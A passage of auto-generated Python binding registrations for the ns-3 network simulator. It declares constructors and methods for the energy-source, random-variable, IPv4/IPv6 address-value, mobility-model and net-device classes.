## energy-source.h (module 'energy'): void ns3::EnergySource::NotifyEnergyDrained() [member function]
cls.add_method('NotifyEnergyDrained',
'void',
[],
visibility='protected')
## energy-source.h (module 'energy'): void ns3::EnergySource::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='private', is_virtual=True)
return
def register_Ns3EnergySourceContainer_methods(root_module, cls):
## energy-source-container.h (module 'energy'): ns3::EnergySourceContainer::EnergySourceContainer(ns3::EnergySourceContainer const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EnergySourceContainer const &', 'arg0')])
## energy-source-container.h (module 'energy'): ns3::EnergySourceContainer::EnergySourceContainer() [constructor]
cls.add_constructor([])
## energy-source-container.h (module 'energy'): ns3::EnergySourceContainer::EnergySourceContainer(ns3::Ptr<ns3::EnergySource> source) [constructor]
cls.add_constructor([param('ns3::Ptr< ns3::EnergySource >', 'source')])
## energy-source-container.h (module 'energy'): ns3::EnergySourceContainer::EnergySourceContainer(std::string sourceName) [constructor]
cls.add_constructor([param('std::string', 'sourceName')])
## energy-source-container.h (module 'energy'): ns3::EnergySourceContainer::EnergySourceContainer(ns3::EnergySourceContainer const & a, ns3::EnergySourceContainer const & b) [constructor]
cls.add_constructor([param('ns3::EnergySourceContainer const &', 'a'), param('ns3::EnergySourceContainer const &', 'b')])
## energy-source-container.h (module 'energy'): void ns3::EnergySourceContainer::Add(ns3::EnergySourceContainer container) [member function]
cls.add_method('Add',
'void',
[param('ns3::EnergySourceContainer', 'container')])
## energy-source-container.h (module 'energy'): void ns3::EnergySourceContainer::Add(ns3::Ptr<ns3::EnergySource> source) [member function]
cls.add_method('Add',
'void',
[param('ns3::Ptr< ns3::EnergySource >', 'source')])
## energy-source-container.h (module 'energy'): void ns3::EnergySourceContainer::Add(std::string sourceName) [member function]
cls.add_method('Add',
'void',
[param('std::string', 'sourceName')])
## energy-source-container.h (module 'energy'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::EnergySource>*,std::vector<ns3::Ptr<ns3::EnergySource>, std::allocator<ns3::Ptr<ns3::EnergySource> > > > ns3::EnergySourceContainer::Begin() const [member function]
cls.add_method('Begin',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::EnergySource > const, std::vector< ns3::Ptr< ns3::EnergySource > > >',
[],
is_const=True)
## energy-source-container.h (module 'energy'): __gnu_cxx::__normal_iterator<const ns3::Ptr<ns3::EnergySource>*,std::vector<ns3::Ptr<ns3::EnergySource>, std::allocator<ns3::Ptr<ns3::EnergySource> > > > ns3::EnergySourceContainer::End() const [member function]
cls.add_method('End',
'__gnu_cxx::__normal_iterator< ns3::Ptr< ns3::EnergySource > const, std::vector< ns3::Ptr< ns3::EnergySource > > >',
[],
is_const=True)
## energy-source-container.h (module 'energy'): ns3::Ptr<ns3::EnergySource> ns3::EnergySourceContainer::Get(uint32_t i) const [member function]
cls.add_method('Get',
'ns3::Ptr< ns3::EnergySource >',
[param('uint32_t', 'i')],
is_const=True)
## energy-source-container.h (module 'energy'): uint32_t ns3::EnergySourceContainer::GetN() const [member function]
cls.add_method('GetN',
'uint32_t',
[],
is_const=True)
## energy-source-container.h (module 'energy'): static ns3::TypeId ns3::EnergySourceContainer::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## energy-source-container.h (module 'energy'): void ns3::EnergySourceContainer::DoDispose() [member function]
cls.add_method('DoDispose',
'void',
[],
visibility='private', is_virtual=True)
## energy-source-container.h (module 'energy'): void ns3::EnergySourceContainer::DoStart() [member function]
cls.add_method('DoStart',
'void',
[],
visibility='private', is_virtual=True)
return
def register_Ns3EnumChecker_methods(root_module, cls):
## enum.h (module 'core'): ns3::EnumChecker::EnumChecker(ns3::EnumChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EnumChecker const &', 'arg0')])
## enum.h (module 'core'): ns3::EnumChecker::EnumChecker() [constructor]
cls.add_constructor([])
## enum.h (module 'core'): void ns3::EnumChecker::Add(int v, std::string name) [member function]
cls.add_method('Add',
'void',
[param('int', 'v'), param('std::string', 'name')])
## enum.h (module 'core'): void ns3::EnumChecker::AddDefault(int v, std::string name) [member function]
cls.add_method('AddDefault',
'void',
[param('int', 'v'), param('std::string', 'name')])
## enum.h (module 'core'): bool ns3::EnumChecker::Check(ns3::AttributeValue const & value) const [member function]
cls.add_method('Check',
'bool',
[param('ns3::AttributeValue const &', 'value')],
is_const=True, is_virtual=True)
## enum.h (module 'core'): bool ns3::EnumChecker::Copy(ns3::AttributeValue const & src, ns3::AttributeValue & dst) const [member function]
cls.add_method('Copy',
'bool',
[param('ns3::AttributeValue const &', 'src'), param('ns3::AttributeValue &', 'dst')],
is_const=True, is_virtual=True)
## enum.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::EnumChecker::Create() const [member function]
cls.add_method('Create',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## enum.h (module 'core'): std::string ns3::EnumChecker::GetUnderlyingTypeInformation() const [member function]
cls.add_method('GetUnderlyingTypeInformation',
'std::string',
[],
is_const=True, is_virtual=True)
## enum.h (module 'core'): std::string ns3::EnumChecker::GetValueTypeName() const [member function]
cls.add_method('GetValueTypeName',
'std::string',
[],
is_const=True, is_virtual=True)
## enum.h (module 'core'): bool ns3::EnumChecker::HasUnderlyingTypeInformation() const [member function]
cls.add_method('HasUnderlyingTypeInformation',
'bool',
[],
is_const=True, is_virtual=True)
return
def register_Ns3EnumValue_methods(root_module, cls):
## enum.h (module 'core'): ns3::EnumValue::EnumValue(ns3::EnumValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EnumValue const &', 'arg0')])
## enum.h (module 'core'): ns3::EnumValue::EnumValue() [constructor]
cls.add_constructor([])
## enum.h (module 'core'): ns3::EnumValue::EnumValue(int v) [constructor]
cls.add_constructor([param('int', 'v')])
## enum.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::EnumValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## enum.h (module 'core'): bool ns3::EnumValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## enum.h (module 'core'): int ns3::EnumValue::Get() const [member function]
cls.add_method('Get',
'int',
[],
is_const=True)
## enum.h (module 'core'): std::string ns3::EnumValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## enum.h (module 'core'): void ns3::EnumValue::Set(int v) [member function]
cls.add_method('Set',
'void',
[param('int', 'v')])
return
def register_Ns3ErlangRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ErlangRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::ErlangRandomVariable::ErlangRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): uint32_t ns3::ErlangRandomVariable::GetK() const [member function]
cls.add_method('GetK',
'uint32_t',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ErlangRandomVariable::GetLambda() const [member function]
cls.add_method('GetLambda',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ErlangRandomVariable::GetValue(uint32_t k, double lambda) [member function]
cls.add_method('GetValue',
'double',
[param('uint32_t', 'k'), param('double', 'lambda')])
## random-variable-stream.h (module 'core'): uint32_t ns3::ErlangRandomVariable::GetInteger(uint32_t k, uint32_t lambda) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'k'), param('uint32_t', 'lambda')])
## random-variable-stream.h (module 'core'): double ns3::ErlangRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::ErlangRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3EventImpl_methods(root_module, cls):
## event-impl.h (module 'core'): ns3::EventImpl::EventImpl(ns3::EventImpl const & arg0) [copy constructor]
cls.add_constructor([param('ns3::EventImpl const &', 'arg0')])
## event-impl.h (module 'core'): ns3::EventImpl::EventImpl() [constructor]
cls.add_constructor([])
## event-impl.h (module 'core'): void ns3::EventImpl::Cancel() [member function]
cls.add_method('Cancel',
'void',
[])
## event-impl.h (module 'core'): void ns3::EventImpl::Invoke() [member function]
cls.add_method('Invoke',
'void',
[])
## event-impl.h (module 'core'): bool ns3::EventImpl::IsCancelled() [member function]
cls.add_method('IsCancelled',
'bool',
[])
## event-impl.h (module 'core'): void ns3::EventImpl::Notify() [member function]
cls.add_method('Notify',
'void',
[],
is_pure_virtual=True, visibility='protected', is_virtual=True)
return
def register_Ns3ExponentialRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::ExponentialRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::ExponentialRandomVariable::ExponentialRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::ExponentialRandomVariable::GetMean() const [member function]
cls.add_method('GetMean',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ExponentialRandomVariable::GetBound() const [member function]
cls.add_method('GetBound',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::ExponentialRandomVariable::GetValue(double mean, double bound) [member function]
cls.add_method('GetValue',
'double',
[param('double', 'mean'), param('double', 'bound')])
## random-variable-stream.h (module 'core'): uint32_t ns3::ExponentialRandomVariable::GetInteger(uint32_t mean, uint32_t bound) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'mean'), param('uint32_t', 'bound')])
## random-variable-stream.h (module 'core'): double ns3::ExponentialRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::ExponentialRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3GammaRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::GammaRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::GammaRandomVariable::GammaRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::GammaRandomVariable::GetAlpha() const [member function]
cls.add_method('GetAlpha',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::GammaRandomVariable::GetBeta() const [member function]
cls.add_method('GetBeta',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::GammaRandomVariable::GetValue(double alpha, double beta) [member function]
cls.add_method('GetValue',
'double',
[param('double', 'alpha'), param('double', 'beta')])
## random-variable-stream.h (module 'core'): uint32_t ns3::GammaRandomVariable::GetInteger(uint32_t alpha, uint32_t beta) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'alpha'), param('uint32_t', 'beta')])
## random-variable-stream.h (module 'core'): double ns3::GammaRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::GammaRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3IntegerValue_methods(root_module, cls):
## integer.h (module 'core'): ns3::IntegerValue::IntegerValue() [constructor]
cls.add_constructor([])
## integer.h (module 'core'): ns3::IntegerValue::IntegerValue(ns3::IntegerValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::IntegerValue const &', 'arg0')])
## integer.h (module 'core'): ns3::IntegerValue::IntegerValue(int64_t const & value) [constructor]
cls.add_constructor([param('int64_t const &', 'value')])
## integer.h (module 'core'): ns3::Ptr<ns3::AttributeValue> ns3::IntegerValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## integer.h (module 'core'): bool ns3::IntegerValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## integer.h (module 'core'): int64_t ns3::IntegerValue::Get() const [member function]
cls.add_method('Get',
'int64_t',
[],
is_const=True)
## integer.h (module 'core'): std::string ns3::IntegerValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## integer.h (module 'core'): void ns3::IntegerValue::Set(int64_t const & value) [member function]
cls.add_method('Set',
'void',
[param('int64_t const &', 'value')])
return
def register_Ns3Ipv4AddressChecker_methods(root_module, cls):
## ipv4-address.h (module 'network'): ns3::Ipv4AddressChecker::Ipv4AddressChecker() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4AddressChecker::Ipv4AddressChecker(ns3::Ipv4AddressChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4AddressChecker const &', 'arg0')])
return
def register_Ns3Ipv4AddressValue_methods(root_module, cls):
## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue(ns3::Ipv4AddressValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4AddressValue const &', 'arg0')])
## ipv4-address.h (module 'network'): ns3::Ipv4AddressValue::Ipv4AddressValue(ns3::Ipv4Address const & value) [constructor]
cls.add_constructor([param('ns3::Ipv4Address const &', 'value')])
## ipv4-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv4AddressValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## ipv4-address.h (module 'network'): ns3::Ipv4Address ns3::Ipv4AddressValue::Get() const [member function]
cls.add_method('Get',
'ns3::Ipv4Address',
[],
is_const=True)
## ipv4-address.h (module 'network'): std::string ns3::Ipv4AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4AddressValue::Set(ns3::Ipv4Address const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Ipv4Address const &', 'value')])
return
def register_Ns3Ipv4MaskChecker_methods(root_module, cls):
## ipv4-address.h (module 'network'): ns3::Ipv4MaskChecker::Ipv4MaskChecker() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4MaskChecker::Ipv4MaskChecker(ns3::Ipv4MaskChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4MaskChecker const &', 'arg0')])
return
def register_Ns3Ipv4MaskValue_methods(root_module, cls):
## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue::Ipv4MaskValue() [constructor]
cls.add_constructor([])
## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue::Ipv4MaskValue(ns3::Ipv4MaskValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv4MaskValue const &', 'arg0')])
## ipv4-address.h (module 'network'): ns3::Ipv4MaskValue::Ipv4MaskValue(ns3::Ipv4Mask const & value) [constructor]
cls.add_constructor([param('ns3::Ipv4Mask const &', 'value')])
## ipv4-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv4MaskValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## ipv4-address.h (module 'network'): bool ns3::Ipv4MaskValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## ipv4-address.h (module 'network'): ns3::Ipv4Mask ns3::Ipv4MaskValue::Get() const [member function]
cls.add_method('Get',
'ns3::Ipv4Mask',
[],
is_const=True)
## ipv4-address.h (module 'network'): std::string ns3::Ipv4MaskValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## ipv4-address.h (module 'network'): void ns3::Ipv4MaskValue::Set(ns3::Ipv4Mask const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Ipv4Mask const &', 'value')])
return
def register_Ns3Ipv6AddressChecker_methods(root_module, cls):
## ipv6-address.h (module 'network'): ns3::Ipv6AddressChecker::Ipv6AddressChecker() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6AddressChecker::Ipv6AddressChecker(ns3::Ipv6AddressChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv6AddressChecker const &', 'arg0')])
return
def register_Ns3Ipv6AddressValue_methods(root_module, cls):
## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue::Ipv6AddressValue() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue::Ipv6AddressValue(ns3::Ipv6AddressValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv6AddressValue const &', 'arg0')])
## ipv6-address.h (module 'network'): ns3::Ipv6AddressValue::Ipv6AddressValue(ns3::Ipv6Address const & value) [constructor]
cls.add_constructor([param('ns3::Ipv6Address const &', 'value')])
## ipv6-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv6AddressValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6AddressValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## ipv6-address.h (module 'network'): ns3::Ipv6Address ns3::Ipv6AddressValue::Get() const [member function]
cls.add_method('Get',
'ns3::Ipv6Address',
[],
is_const=True)
## ipv6-address.h (module 'network'): std::string ns3::Ipv6AddressValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6AddressValue::Set(ns3::Ipv6Address const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Ipv6Address const &', 'value')])
return
def register_Ns3Ipv6PrefixChecker_methods(root_module, cls):
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixChecker::Ipv6PrefixChecker() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixChecker::Ipv6PrefixChecker(ns3::Ipv6PrefixChecker const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv6PrefixChecker const &', 'arg0')])
return
def register_Ns3Ipv6PrefixValue_methods(root_module, cls):
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue::Ipv6PrefixValue() [constructor]
cls.add_constructor([])
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue::Ipv6PrefixValue(ns3::Ipv6PrefixValue const & arg0) [copy constructor]
cls.add_constructor([param('ns3::Ipv6PrefixValue const &', 'arg0')])
## ipv6-address.h (module 'network'): ns3::Ipv6PrefixValue::Ipv6PrefixValue(ns3::Ipv6Prefix const & value) [constructor]
cls.add_constructor([param('ns3::Ipv6Prefix const &', 'value')])
## ipv6-address.h (module 'network'): ns3::Ptr<ns3::AttributeValue> ns3::Ipv6PrefixValue::Copy() const [member function]
cls.add_method('Copy',
'ns3::Ptr< ns3::AttributeValue >',
[],
is_const=True, is_virtual=True)
## ipv6-address.h (module 'network'): bool ns3::Ipv6PrefixValue::DeserializeFromString(std::string value, ns3::Ptr<ns3::AttributeChecker const> checker) [member function]
cls.add_method('DeserializeFromString',
'bool',
[param('std::string', 'value'), param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_virtual=True)
## ipv6-address.h (module 'network'): ns3::Ipv6Prefix ns3::Ipv6PrefixValue::Get() const [member function]
cls.add_method('Get',
'ns3::Ipv6Prefix',
[],
is_const=True)
## ipv6-address.h (module 'network'): std::string ns3::Ipv6PrefixValue::SerializeToString(ns3::Ptr<ns3::AttributeChecker const> checker) const [member function]
cls.add_method('SerializeToString',
'std::string',
[param('ns3::Ptr< ns3::AttributeChecker const >', 'checker')],
is_const=True, is_virtual=True)
## ipv6-address.h (module 'network'): void ns3::Ipv6PrefixValue::Set(ns3::Ipv6Prefix const & value) [member function]
cls.add_method('Set',
'void',
[param('ns3::Ipv6Prefix const &', 'value')])
return
def register_Ns3LogNormalRandomVariable_methods(root_module, cls):
## random-variable-stream.h (module 'core'): static ns3::TypeId ns3::LogNormalRandomVariable::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## random-variable-stream.h (module 'core'): ns3::LogNormalRandomVariable::LogNormalRandomVariable() [constructor]
cls.add_constructor([])
## random-variable-stream.h (module 'core'): double ns3::LogNormalRandomVariable::GetMu() const [member function]
cls.add_method('GetMu',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::LogNormalRandomVariable::GetSigma() const [member function]
cls.add_method('GetSigma',
'double',
[],
is_const=True)
## random-variable-stream.h (module 'core'): double ns3::LogNormalRandomVariable::GetValue(double mu, double sigma) [member function]
cls.add_method('GetValue',
'double',
[param('double', 'mu'), param('double', 'sigma')])
## random-variable-stream.h (module 'core'): uint32_t ns3::LogNormalRandomVariable::GetInteger(uint32_t mu, uint32_t sigma) [member function]
cls.add_method('GetInteger',
'uint32_t',
[param('uint32_t', 'mu'), param('uint32_t', 'sigma')])
## random-variable-stream.h (module 'core'): double ns3::LogNormalRandomVariable::GetValue() [member function]
cls.add_method('GetValue',
'double',
[],
is_virtual=True)
## random-variable-stream.h (module 'core'): uint32_t ns3::LogNormalRandomVariable::GetInteger() [member function]
cls.add_method('GetInteger',
'uint32_t',
[],
is_virtual=True)
return
def register_Ns3MobilityModel_methods(root_module, cls):
## mobility-model.h (module 'mobility'): ns3::MobilityModel::MobilityModel(ns3::MobilityModel const & arg0) [copy constructor]
cls.add_constructor([param('ns3::MobilityModel const &', 'arg0')])
## mobility-model.h (module 'mobility'): ns3::MobilityModel::MobilityModel() [constructor]
cls.add_constructor([])
## mobility-model.h (module 'mobility'): int64_t ns3::MobilityModel::AssignStreams(int64_t stream) [member function]
cls.add_method('AssignStreams',
'int64_t',
[param('int64_t', 'stream')])
## mobility-model.h (module 'mobility'): double ns3::MobilityModel::GetDistanceFrom(ns3::Ptr<const ns3::MobilityModel> position) const [member function]
cls.add_method('GetDistanceFrom',
'double',
[param('ns3::Ptr< ns3::MobilityModel const >', 'position')],
is_const=True)
## mobility-model.h (module 'mobility'): ns3::Vector ns3::MobilityModel::GetPosition() const [member function]
cls.add_method('GetPosition',
'ns3::Vector',
[],
is_const=True)
## mobility-model.h (module 'mobility'): double ns3::MobilityModel::GetRelativeSpeed(ns3::Ptr<const ns3::MobilityModel> other) const [member function]
cls.add_method('GetRelativeSpeed',
'double',
[param('ns3::Ptr< ns3::MobilityModel const >', 'other')],
is_const=True)
## mobility-model.h (module 'mobility'): static ns3::TypeId ns3::MobilityModel::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## mobility-model.h (module 'mobility'): ns3::Vector ns3::MobilityModel::GetVelocity() const [member function]
cls.add_method('GetVelocity',
'ns3::Vector',
[],
is_const=True)
## mobility-model.h (module 'mobility'): void ns3::MobilityModel::SetPosition(ns3::Vector const & position) [member function]
cls.add_method('SetPosition',
'void',
[param('ns3::Vector const &', 'position')])
## mobility-model.h (module 'mobility'): void ns3::MobilityModel::NotifyCourseChange() const [member function]
cls.add_method('NotifyCourseChange',
'void',
[],
is_const=True, visibility='protected')
## mobility-model.h (module 'mobility'): int64_t ns3::MobilityModel::DoAssignStreams(int64_t start) [member function]
cls.add_method('DoAssignStreams',
'int64_t',
[param('int64_t', 'start')],
visibility='private', is_virtual=True)
## mobility-model.h (module 'mobility'): ns3::Vector ns3::MobilityModel::DoGetPosition() const [member function]
cls.add_method('DoGetPosition',
'ns3::Vector',
[],
is_pure_virtual=True, is_const=True, visibility='private', is_virtual=True)
## mobility-model.h (module 'mobility'): ns3::Vector ns3::MobilityModel::DoGetVelocity() const [member function]
cls.add_method('DoGetVelocity',
'ns3::Vector',
[],
is_pure_virtual=True, is_const=True, visibility='private', is_virtual=True)
## mobility-model.h (module 'mobility'): void ns3::MobilityModel::DoSetPosition(ns3::Vector const & position) [member function]
cls.add_method('DoSetPosition',
'void',
[param('ns3::Vector const &', 'position')],
is_pure_virtual=True, visibility='private', is_virtual=True)
return
def register_Ns3NetDevice_methods(root_module, cls):
## net-device.h (module 'network'): ns3::NetDevice::NetDevice() [constructor]
cls.add_constructor([])
## net-device.h (module 'network'): ns3::NetDevice::NetDevice(ns3::NetDevice const & arg0) [copy constructor]
cls.add_constructor([param('ns3::NetDevice const &', 'arg0')])
## net-device.h (module 'network'): void ns3::NetDevice::AddLinkChangeCallback(ns3::Callback<void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty> callback) [member function]
cls.add_method('AddLinkChangeCallback',
'void',
[param('ns3::Callback< void, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty, ns3::empty >', 'callback')],
is_pure_virtual=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetAddress() const [member function]
cls.add_method('GetAddress',
'ns3::Address',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetBroadcast() const [member function]
cls.add_method('GetBroadcast',
'ns3::Address',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Ptr<ns3::Channel> ns3::NetDevice::GetChannel() const [member function]
cls.add_method('GetChannel',
'ns3::Ptr< ns3::Channel >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): uint32_t ns3::NetDevice::GetIfIndex() const [member function]
cls.add_method('GetIfIndex',
'uint32_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): uint16_t ns3::NetDevice::GetMtu() const [member function]
cls.add_method('GetMtu',
'uint16_t',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetMulticast(ns3::Ipv4Address multicastGroup) const [member function]
cls.add_method('GetMulticast',
'ns3::Address',
[param('ns3::Ipv4Address', 'multicastGroup')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Address ns3::NetDevice::GetMulticast(ns3::Ipv6Address addr) const [member function]
cls.add_method('GetMulticast',
'ns3::Address',
[param('ns3::Ipv6Address', 'addr')],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): ns3::Ptr<ns3::Node> ns3::NetDevice::GetNode() const [member function]
cls.add_method('GetNode',
'ns3::Ptr< ns3::Node >',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): static ns3::TypeId ns3::NetDevice::GetTypeId() [member function]
cls.add_method('GetTypeId',
'ns3::TypeId',
[],
is_static=True)
## net-device.h (module 'network'): bool ns3::NetDevice::IsBridge() const [member function]
cls.add_method('IsBridge',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::IsBroadcast() const [member function]
cls.add_method('IsBroadcast',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::IsLinkUp() const [member function]
cls.add_method('IsLinkUp',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::IsMulticast() const [member function]
cls.add_method('IsMulticast',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::IsPointToPoint() const [member function]
cls.add_method('IsPointToPoint',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
## net-device.h (module 'network'): bool ns3::NetDevice::NeedsArp() const [member function]
cls.add_method('NeedsArp',
'bool',
[],
is_pure_virtual=True, is_const=True, is_virtual=True)
